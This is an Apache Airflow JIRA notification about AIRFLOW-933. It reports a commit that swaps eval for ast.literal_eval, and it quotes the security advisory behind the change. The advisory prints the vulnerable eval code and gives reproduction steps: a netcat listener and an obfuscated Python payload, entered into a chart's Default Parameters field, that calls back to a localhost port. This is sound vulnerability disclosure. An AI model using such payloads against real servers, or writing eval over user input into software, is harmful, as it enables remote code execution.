[
https://issues.apache.org/jira/browse/AIRFLOW-933?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15891150#comment-15891150
]
ASF subversion and git services commented on AIRFLOW-933:
---------------------------------------------------------
Commit 88d9b0dc96e7528c87326c8070ee276e8565545f in incubator-airflow's branch
refs/heads/master from [~amaliujia]
[ https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;h=88d9b0d ]
[AIRFLOW-933] use ast.literal_eval rather eval because ast.literal_eval does
not execute
input.
This PR addresses the following issues:
- *(https://issues.apache.org/jira/browse/AIRFLOW-
933)*
This PR is trying to solve a secure issue. The
test was done by setting up a local web server and
reproduce the issue described in JIRA link above.
Closes #2117 from amaliujia/master
> Security - Airflow Use of Eval Allows for Remote Code Execution
> ---------------------------------------------------------------
>
> Key: AIRFLOW-933
> URL: https://issues.apache.org/jira/browse/AIRFLOW-933
> Project: Apache Airflow
> Issue Type: Bug
> Reporter: Rui Wang
> Assignee: Rui Wang
>
> mpact: Any user with the ability to create or edit Charts may execute
> arbitrary code on the Airflow server.
> Location: The Default Parameters form eld sent when saving a Chart located at
> /admin/chart/new/
> Description: The Chart functionality allows for the definition of Default
> Parameters, which are baseline constraints for the values within a chart.
> This data is user-controllable and passed directly to a Python eval, which
> will execute code:
> {code}
> def label_link(v, c, m, p):
> try:
> default_params = eval(m.default_params)
> except:
> default_params = {}
> url = url_for(
> 'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
> **default_params)
> return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
> {code}
> Reproduction Steps:
> 1. Configure a local instance of Airflow, and start a local netcat listener
> with the following shell command: nc -l 1337.
> 2. Access Airflow as a user able to create or edit Charts.
> 3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
> 4. In its Default Parameters field, and enter-in the following example
> payload:
> (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (),
> None)[1] for __g['urllib'] in [(__import__('urllib.request', __g,
> __g))]][0])(globals())
> 5. Save the Chart, and observe that the application has made a network
> request to your listener, indicating that your code has executed.
> Remediation: Use the Python method ast.literal_eval
> (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely
> parses its input, rather than executing it as code.
--
This message was sent by Atlassian JIRA
(v6.3.15#6346)
